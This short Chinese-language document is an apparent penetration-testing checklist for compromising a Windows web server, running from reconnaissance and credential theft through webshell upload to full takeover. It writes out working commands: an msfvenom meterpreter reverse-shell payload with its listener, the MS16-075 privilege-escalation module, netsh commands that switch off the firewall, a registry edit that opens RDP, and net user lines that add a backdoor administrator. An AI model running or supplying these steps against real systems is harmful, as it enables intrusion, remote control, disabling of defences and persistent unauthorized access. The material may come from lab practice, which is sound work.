基本流程
一、查看robots.txt文件看看是否有敏感信息
二、扫目录,一个备份文件和后台
三、从备份文件中找到后台帐号密码,登陆
四、找到上传点,上传一句话木马
五、蚁剑连接,查看当前权限
六、收集信息
七、根据补丁号,找提权exp
八、MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.96 lport=4444 -f exe -o /home/kali/Desktop/b.exe
九、执行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.96
show options
十、上传并执行木马
十一、获取一个低权限的shell
十二、自动化提权getsystem
十三、提权失败,利用补丁找到对应的exp,如:MS16-075
background //把你当前的metasploit shell转为后台执行
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
run
十四、shell,进入进入cmd终端,出现乱码使用,chcp 65001
十五、关闭防火墙
NetSh Advfirewall set allprofiles state on //开启防火墙
NetSh Advfirewall set allprofiles state off //关闭防火墙
十六、开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f //关闭3389
十七、添加用户到管理员组
ne user //查看用户
net user secxun qwe123. /add //添加用户
net localgroup administrators secxun /add //将用户添加到管理员组中